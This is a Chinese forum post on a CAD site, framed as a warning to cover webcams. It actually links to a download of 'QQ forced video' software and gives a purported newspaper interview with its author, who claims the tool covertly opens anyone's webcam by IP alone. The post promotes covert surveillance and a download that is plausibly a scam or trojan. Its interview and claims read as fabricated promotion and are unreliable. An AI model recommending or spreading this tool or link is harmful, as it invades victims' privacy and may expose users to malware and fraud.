找回密码 注册 QQ登录
开思网工业级高精度在线3D打印服务

iCAx开思网

CAD/CAM/CAE/设计/模具 高清视频【积分说明】如何快速获得积分?在线3D打印服务,一键上传,自动报价 

[资料] 以后大家不用摄像头就把它该住!!

马上注册,结交更多同行朋友,交流,分享,学习。

您需要 登录 才可以下载或查看,没有帐号?注册

x
现在有一种软件,在你不知道的情况下,悄悄的开了你的摄像头,偷窥你的私隐!恐怖啊!
这是下载这软件的地址:https://uronglianfa.softsooo.cn

最近网上炒的纷纷扬扬冰雹暴力QQ强制视频软件专业版的软件 真伪问题,记者在 网上联系到这个软件的作者zhqll 在得到记者的再三保证下,他给记者提供了一组 注册码,测试后果然如其宣传的那样可以只用IP就能 链接到对方的视频,而对方却根本不知道自己已经被人 用摄像头偷窥了,根据这个使用事实,笔者见到了软件作者本人。并对其进行了如下 采访。
记者问:为什么要用户推广网址才能得到注册码?
答:开发这个软件其实算是个偶然,开发完后自己玩了玩就想发到网上让大家都试试,可是一个朋友提醒我,这个软件如果无节制的公开出去后会造成一定的社会影响,所以我就开发了注册码限制,想得到注册码就为我宣传一下,呵呵满足一下我的虚荣心。这样就可以有限的推广了我的软件
记者问:是不是打算成功推出这款软件后会开始收费服务,比如用户购买注册码等?
答:不会的,我不打算将这个软件商业化,也不会收取任何费用,如果这个软件成熟了的话,希望能有大的软件厂商购买这款软件的话还是可以的!我本身开发这个是玩玩和研究而并无什么特殊目的。
记者问:现在网上有很多人说冰雹暴力QQ强制视频软件是假的,根本不可能,并且纷纷出现很多同类的软件你如何解释?
答:这是没办法的,我了解到的是很多程序员想尝试破解我这个软件,但是都没有破解成功,所以就将不完整的软件,放到网上供人下载有些人也是跟我一样推广自己的网址,有些干脆骗人去出售。这个我也没办法!我这个软件你刚才不是也测试了嘛,使用效果我想你也知道是不是网上说的那样了吧。
记者:嗯,确实用起来不错,不过没有声音,只有画面很可惜!
答:这个我当初开发的时候只是觉得看到对方视频画面就可以了!毕竟中国国内宽带都不是统一的快速,所以为了保证画面流畅,我没有让传输音频编码。
记者:好的感谢你接受我们《电脑报》的采访,期待你下一期更好的版本开发完成!
答:暂时没有开发计划,也谢谢你们。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享淘帖 赞一下!赞一下!

x

x

x